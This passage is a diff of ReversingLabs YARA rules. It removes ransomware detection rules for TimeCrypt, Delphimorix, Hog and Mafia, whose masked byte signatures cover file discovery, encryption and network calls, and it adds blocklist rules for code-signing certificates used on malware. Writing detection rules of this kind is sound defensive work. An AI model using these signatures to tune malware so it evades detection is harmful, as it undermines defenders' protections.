+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR ADAMS CONSULTING LIMITED" and pe.signatures [ i ] . serial == "44:31:2c:b9:a9:27:b4:11:13:60:76:2b:4d:4b:dd:6d" and 1554768000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TimeCrypt ransomware."
-		author = "ReversingLabs"
-		id = "38a0c383-8be6-5258-aa93-0cf09b18e5f7"
-		date = "2021-12-06"
-		modified = "2021-12-06"
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "601ddd98-8cd5-5c52-a59a-d4a0556fc316"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara#L1-L69"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6849d6d5010d7bcb4052c10d5bd7cc29320ffc986f36289b272a1e9a8d14fab9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15720-L15736"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f55835c7404edab96bc5c8fe3844f3380f1f6bc8b43da1d51213de899629e8f5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TimeCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09
-            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ??
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F
-            ?? ?? ?? ?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F
-            ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$send_http_request = {
-            1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19
-            03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ??
-            ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
-        }
-		$send_dns_request = {
-            1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19
-            72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            26 DE ?? 26 DE ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $send_http_request ) and ( $send_dns_request )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "12:3a:50:74:06:91:62:f4:ed:68:fc:7d:48:f4:64:c2" and 1472428800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Delphimorix : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Delphimorix ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1f964601-9819-5597-ba6e-db3a30e3aa5a"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "5f4da614-3bc8-5ae8-b04b-e4b3972522ff"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Delphimorix.yara#L1-L67"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6d401d488d57b2d75e93a1dfd47ece687a5791d1f0a52768300f4af8a8787212"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15738-L15754"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "03adb8a9bf2a8f0633b34d5c39816b47e60b9e598208f7de79ad9d9a7ab8cc5e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Delphimorix"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55
-            68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B
-            4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B C3
-            8B 10 FF 12 52 50 B9 ?? ?? ?? ?? 8B D3 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
-            C6 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02
-            ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
-        }
-		$find_files_p2 = {
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
-            C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 75 ?? 68 ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV \"MARIYA\"" and pe.signatures [ i ] . serial == "64:eb:04:b8:de:f3:82:b5:ef:a7:5f:63:e0:e8:5a:d0" and 1535587200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Hog : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Hog ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b4f26acf-5ff1-5c49-8cfa-8f619af84efd"
-		date = "2021-10-12"
-		modified = "2021-10-12"
+		id = "f7eae73e-6b12-5507-846e-d3b409243adf"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Hog.yara#L1-L70"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c5cbc79fee9083ed3befa6b0d348f2d38064bb9012b8f0ca11afd7137243866d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15756-L15772"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "87f9930967d5832d3003672eeb89669b54feed1ca2ea5eec478c50e3cb7a7571"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Hog"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$generate_key = {
-            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08
-            16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ??
-            07 6F ?? ?? ?? ?? DC 11 ?? 2A
-        }
-		$find_files = {
-            16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ??
-            ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C
-            2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ??
-            ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ??
-            DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 2A
-        }
-		$encrypt_files_p1 = {
-            02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19
-            73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ??
-            ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ??
-            07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ??
-            ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ??
-            ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ??
-            ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B
-            73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ??
-            ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ??
-            ?? DC 26 DE ?? 02 2A 11 ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "76:d8:d9:08:ee:d2:f9:85:7d:c5:67:6a:68:0c:ea:c9" and 1467158400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Mafia : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_083E3F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Mafia ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "67f09000-751f-539a-b222-25b1502c2728"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "b9a1b1a7-2333-5a6f-85c9-6c19d34c4aa4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Mafia.yara#L1-L142"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5c17b799f0b4f1f8f72a2e4203a6606f7783ceec2034694f8a21ff65e5afdb26"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15774-L15790"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6977d48a2e31235d780cba1b84b39a90e409ee8ea5555e01cbc34989ecd3882d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Mafia"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 8B F1 6A ?? 50 89 74 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 66 89 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ??
-            0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 8D
-            8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 FF D6 B8 ?? ??
-            ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 56 81 EC ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
-            ?? 8D 54 24 ?? 52 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 50 81 EC ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 8D
-            4C 24 ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
-            ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 33 C0 57
-            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 75 ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 C0 68 ??
-            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 33 C0 89 85
-        }
-		$remote_connection_p2 = {
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? 66 89 95 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D
-            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF 8A 08 40 84 C9 75 ?? 6A
-            ?? 2B C2 50 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 56 FF D3 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 50
-            8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
-            D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB
-            ?? 68 ?? ?? ?? ?? FF D7 56 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ??
-            8B E5 5D C3 68
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 8B 75 ?? 57 68 ?? ?? ?? ?? 33 DB 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89
-            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 53 52 89 5C 24
